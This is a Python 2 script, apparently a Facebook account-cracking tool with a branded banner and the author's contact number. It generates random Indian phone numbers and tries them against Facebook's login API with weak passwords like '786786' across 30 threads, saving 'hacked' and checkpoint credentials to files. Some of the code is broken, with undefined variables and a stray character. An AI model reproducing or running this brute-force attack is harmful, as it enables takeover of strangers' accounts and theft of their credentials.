#!/usr/bin/python2
#coding=utf-8
#The Credit For This Code Goes To somi
#If You Wanna Take Credits For This Code, Please Look Yourself Again...
#Reserved2020


import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(50000):

    nmbr = random.randint(1111111, 9999999)
    
    sys.stdout = open('.txt', 'a')

    print(nmbr)

    sys.stdout.flush()
    
try:
    import requests
except ImportError:
    os.system('pip2 install mechanize')
    
try:
    import mechanize
except ImportError:
    os.system('pip2 install request')
    time.sleep(1)
    os.system('Then type: python2 Dashing-boy.py')

import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser


reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def exb():
    print '[!] Exit Successfully thanku somi'
    os.sys.exit()


def acak(b):
    w = 'ahtdzjc'
    d = ''
    for i in x:
        d += '!'+w[random.randint(0,len(w)-1)]+i
    return cetak(d)


def cetak(b):
    w = 'ahtdzjc'
    for i in w:
        j = w.index(i)
        x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
    x += '\033[0m'
    x = x.replace('!0','\033[0m')
    sys.stdout.write(x+'\n')


def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(3.0 / 200)
def tik():
	titik = ['.L ','Lo ','Loading..']
	for o in titik:
		print("\r\x1b[1;93m \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)


back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"

os.system("clear")
print  """

                                    
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛      
\033[1;91m➙DEVOLPER   :    SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE   :   USE FAST INTERNET
\033[1;90m➙NOTE   :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛
"""
logo1 = """
       \033[1;91m_____    ____      __  __   _____ 
     \033[1;91m / ____|  / __ \    |  \/  | |_   _|
    \033[1;92m | (___   | |  | |   | \  / |   | |  
    \033[1;92m  \___ \  | |  | |   | |\/| |   | |  
    \033[1;95m  ____) | | |__| |   | |  | |  _| |_ 
    \033[1;95m |_____/   \____/    |_|  |_| |_____|
                                    
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛              
\033[1;91m➙DEVOLPER  :     SOMI AWAN
\033[1;96m➙WHATSAAP  :   03455453538
\033[1;93m➙NOTE  :   USE FAST INTERNET
\033[1;90m➙NOTE  :   USE 4 TO 6 GB RAM PHONE
\033[1;92m❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛❜❛         
         
"""
logo2 = """
       \033[1;91m_____    ____      __  __   _____ 
     \033[1;91m / ____|  / __ \    |  \/  | |_   _|
    \033[1;92m | (___   | |  | |   | \  / |   | |  
    \033[1;92m  \___ \  | |  | |   | |\/| |   | |  
    \033[1;95m  ____) | | |__| |   | |  | |  _| |_ 
    \033[1;95m |_____/   \____/    |_|  |_| |_____|
\033[0;91m_____________________________________¶¶___________
________________________________¶1¶1111111¶_______
________¶¶111¶_______________¶¶¶¶111111111¶¶¶1____
_____¶1¶¶¶¶¶111111¶_________¶¶¶1¶¶¶11111111¶1¶¶___
___¶¶¶1¶1111111111¶¶1______¶¶1¶¶¶1111111111111¶¶__
__¶¶1¶¶1111111111111¶¶_____¶¶¶1¶¶¶¶1111111111111¶_
__¶¶_¶1111111111111111¶¶___¶¶¶¶¶¶11¶111111111111¶_
_11_¶11111111111111111¶¶_____¶¶¶¶__¶111111111111¶¶
¶¶¶¶1111111111111111¶¶¶¶_____1¶¶__11111111111111¶¶
¶¶¶¶11111111111¶¶¶¶¶¶¶______1¶1¶¶1111111111111111¶
¶¶1¶1111111111111¶¶¶¶¶¶_____¶¶¶¶¶¶11111111111111¶¶
¶¶11111111111111111111111¶¶___¶¶¶¶¶¶1111111111¶¶¶_
_1¶111111111111111111¶¶¶¶¶¶____¶¶¶¶11111111111¶1__
__¶¶11111111111111111¶¶¶_____¶¶¶1111111111111¶1___
___¶¶¶111111111111¶1¶¶¶____1¶¶111¶1111111¶11¶1____
____1¶¶¶11111111111¶¶¶¶111¶¶¶¶111111111¶11¶¶¶_____
______¶¶¶¶1111111111111¶¶¶¶1¶¶¶¶¶¶¶¶11¶11¶¶_______
_______¶¶¶¶¶11111111111¶111¶___¶¶¶111¶1¶¶¶________
_________¶¶¶¶¶¶111111111111¶__¶¶¶111¶¶¶1__________
____________1¶¶¶¶¶11111111¶¶_¶¶¶¶111¶¶____________
______________¶¶¶¶¶¶¶1111111_¶¶¶11¶¶1_____________
_________________1¶¶¶¶¶¶1111¶¶¶1¶¶¶¶______________
____________________¶¶¶¶¶¶1¶¶¶¶¶1¶________________
_______________________¶1¶¶¶1¶¶¶__________________
___________________________11¶____________________
                  
                  

\033[1;47m\033[1;31m            SELECT INDIAN  SIM CODE            \033[1;0m   

\033[1;93m905,975,755,855,954, 897,
\033[1;96m 967, 937, 700, 727, 965, 786, 
\033[1;94m874, 856, 566, 590, 527, 568, 578

"""
logo3 = """
\033[0;91m_____________________________________¶¶___________
________________________________¶1¶1111111¶_______
________¶¶111¶_______________¶¶¶¶111111111¶¶¶1____
_____¶1¶¶¶¶¶111111¶_________¶¶¶1¶¶¶11111111¶1¶¶___
___¶¶¶1¶1111111111¶¶1______¶¶1¶¶¶1111111111111¶¶__
__¶¶1¶¶1111111111111¶¶_____¶¶¶1¶¶¶¶1111111111111¶_
__¶¶_¶1111111111111111¶¶___¶¶¶¶¶¶11¶111111111111¶_
_11_¶11111111111111111¶¶_____¶¶¶¶__¶111111111111¶¶
¶¶¶¶1111111111111111¶¶¶¶_____1¶¶__11111111111111¶¶
¶¶¶¶11111111111¶¶¶¶¶¶¶______1¶1¶¶1111111111111111¶
¶¶1¶1111111111111¶¶¶¶¶¶_____¶¶¶¶¶¶11111111111111¶¶
¶¶11111111111111111111111¶¶___¶¶¶¶¶¶1111111111¶¶¶_
_1¶111111111111111111¶¶¶¶¶¶____¶¶¶¶11111111111¶1__
__¶¶11111111111111111¶¶¶_____¶¶¶1111111111111¶1___
___¶¶¶111111111111¶1¶¶¶____1¶¶111¶1111111¶11¶1____
____1¶¶¶11111111111¶¶¶¶111¶¶¶¶111111111¶11¶¶¶_____
______¶¶¶¶1111111111111¶¶¶¶1¶¶¶¶¶¶¶¶11¶11¶¶_______
_______¶¶¶¶¶11111111111¶111¶___¶¶¶111¶1¶¶¶________
_________¶¶¶¶¶¶111111111111¶__¶¶¶111¶¶¶1__________
____________1¶¶¶¶¶11111111¶¶_¶¶¶¶111¶¶____________
______________¶¶¶¶¶¶¶1111111_¶¶¶11¶¶1_____________
_________________1¶¶¶¶¶¶1111¶¶¶1¶¶¶¶______________
____________________¶¶¶¶¶¶1¶¶¶¶¶1¶________________
_______________________¶1¶¶¶1¶¶¶__________________
___________________________11¶____________________
                  
                  
\033[1;47m\033[1;31m            💔💔 SOMI  🌟  BOY💔💔             \033[1;0m   


"""

##### LICENSE #####
#=================#
def lisensi():
    os.system('clear')
    login()
####login#########
def login():
    os.system('clear')
    print logo1
    jalan('\033[1;96m▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬')
    print 
    print
    print
    jalan('\x1b[1;91m[\x1b[1;92m1\x1b[1;91m]  \x1b[1;92mPAKI\033[1;97mSTAN \033[1;91mATTACK\033[1;0m\033[1;97m (Update Series)')
    jalan('\x1b[1;91m[\x1b[1;92m2\x1b[1;91m]  \x1b[1;93mUPD\033[1;91mATE \033[1;94mPROGRAM\033[1;0m\033[1;97m (NOW)')
    print
    print
    print
    jalan('\033[1;92m▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬')
    jalan('    \x1b[1;91m[\x1b[1;93m2\x1b[1;91m] \x1b[1;92mYou\033[1;97mtube \x1b[1;91m[\x1b[1;93m3\x1b[1;91m] \x1b[1;94m Face\033[1;97mbook \x1b[1;91m[\x1b[1;93m00\x1b[1;91m] \x1b[1;92m EXIT')
    jalan('\033[1;92m▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬')
    pilih_Somi()
    
def pilih_Somi():    
    Somi = raw_input("\n\033[1;96mChoose >>>\033[1;93m")
    if Somi =="":
        print "\x1b[1;97mWRONG "
        pilih_Somi()
    elif Somi =="1":
    	os.system("clear")
        print logo2
        try:
            c = raw_input("\033[1;93mChoose >>> \033[1;96m")
            k="+91"
            idlist = ('.txt')
            for line in open(idlist,"r").readlines():
                id.append(line.strip())
        except IOError:
            print ("[!] File Not Found")
            raw_input("\n[ Back ]")
            Somi()
            tik()
             
    elif Somi =="2":                               
    	tik()
    	os.system('xdg-open https://youtu.be/kvo2PWGBI8I')
        Somi()
    elif Somi =="3":                                    
    	tik()
    	os.system('xdg-open https://www.facebook.com/100041349421055/posts/468636641191313/?substory_index=0&app=fbl')
        Somi()
        tik()
    elif Somi == '00':
        exb()    
        login()
    else:
        print '[!] Fill In Correctly'
        action()
    print 47* '\033[1;96m▬'
    xxx = str(len(id))
    jalan ('\033[1;96m➾ TOTAL IDS NUMBER : '+xxx)
    jalan ('\033[1;92m➾ CODE YOU CHOOSE: '+c)
    jalan ("\033[1;93m➾ PLEASE WAIT, PROCESS IS START ..")
    jalan ("\033[1;94m➾ TO STOP THIS PROCESS PRESS Ctrl THEN z")
    print 47* '\033[1;96m▬'
    print (logo3)
    def main(arg):
        global cpb,oks
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass
        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;92m ◊\033[1;96m '+ k + c + user + ' \033[1;92m ◊  \033[1;91m' + pass1                                       
                okb = open('save/successful.txt', 'a')
                okb.write(k+c+user+pass1+'\n')
                okb.close()
                oks.append(c+user+pass1)
            else:
                if 'www.facebook.com' in q['error_msg']:
                    print '\033[1;92m[CHECK\033[1;96mPOINT]\033[1;92m ◊ \033[1;93m' + k + c + user + ' \033[1;92m ◊ \033[1;96m ' + pass1
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k+c+user+pass1+'\n')
                    cps.close()
                    cpb.append(c+user+pass1)
                else:
                    pass2 = "786786"
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;92m ◊\033[1;96m '+ k + c + user + ' \033[1;92m ◊  \033[1;91m' + pass2                                 
                        okb = open('save/successful.txt', 'a')
                        okb.write(k+c+user+pass2+'\n')
                        okb.close()
                        oks.append(c+user+pass2)
                    else:
                        if 'www.facebook.com' in q['error_msg']:
                            print '\033[1;92m[CHECK\033[1;96mPOINT]\033[1;92m ◊ \033[1;93m' + k + c + user + ' \033[1;92m ◊ \033[1;96m ' + pass2
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k+c+user+pass2+'\n')
                            cps.close()
                            cpb.append(c+user+pass2)
                        else:
                            pass3="000786"
                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                            q = json.load(data)
                            if 'access_token' in q:
                                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;92m ◊\033[1;96m '+ k + c + user + ' \033[1;92m ◊  \033[1;91m' + pass3                                 
                                okb = open('save/successful.txt', 'a')
                                okb.write(k+c+user+pass3+'\n')
                                okb.close()
                                oks.append(c+user+pass3)
                            else:
                                if 'www.facebook.com' in q['error_msg']:
                                    print '\033[1;92m[CHECK\033[1;96mPOINT]\033[1;92m ◊ \033[1;93m' + k + c + user + ' \033[1;92m ◊ \033[1;96m ' + pass3
                                    cps = open('save/checkpoint.txt', 'a')
                                    cps.write(k+c+user+pass3+'\n')
                                    cps.close()
                                    cpb.append(c+user+pass3)
                                else:
                                    pass4="786786786"
                                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                    q = json.load(data)
                                    if 'access_token' in q:
                                        print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;92m ◊\033[1;96m '+ k + c + user + ' \033[1;92m ◊  \033[1;91m' + pass4                                
                                        okb = open('save/successful.txt', 'a')
                                        okb.write(k+c+user+pass4+'\n')
                                        okb.close()
                                        oks.append(c+user+pass4)
                                    else:
                                        if 'www.facebook.com' in q['error_msg']:
                                            print '\033[1;92m[CHECK\033[1;96mPOINT]\033[1;92m ◊ \033[1;93m' + k + c + user + ' \033[1;92m ◊ \033[1;96m ' + pass4
                                            cps = open('save/checkpoint.txt', 'a')
                                            cps.write(k+c+user+pass4+'\n')
                                            cps.close()
                                            cpb.append(c+user+pass4)
                                        else:
                                            pass5="786786"
                                            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                                            q = json.load(data)
                                            if 'access_token' in q:
                                                print '\x1b[1;94m(HAC\x1b[1;92mKED)\033[1;92m ◊\033[1;96m '+ k + c + user + ' \033[1;92m ◊  \033[1;91m' + pass5                                   
                                                okb = open('save/cloned.txt', 'a')
                                                okb.write(k+c+user+pass5+'\n')
                                                okb.close()
                                                oks.append(c+user+pass5)
                                            else:
                                                if 'www.facebook.com' in q['error_msg']:
                                                    print '\033[1;92m[CHECK\033[1;96mPOINT]\033[1;92m ◊ \033[1;93m' + k + c + user + ' \033[1;92m ◊ \033[1;96m ' + pass5 
                                                    cps = open('save/cloned.txt', 'a')
                                                    cps.write(k+c+user+pass5+'\n')7
                                                    cps.close()
                                                    cpb.append(c+user+pass5)
                                                                
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            
                                                                                                                                                                                                            

                                                                                                                                                                                                            
                                                                                                                                                                                                                    
                                                                                                                                                                                                            



        except:
            pass
        
    p = ThreadPool(30)
    p.map(main, id)
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    print ''
    print """
    """
    
    raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
    login() 
          
if __name__ == '__main__':
    login()

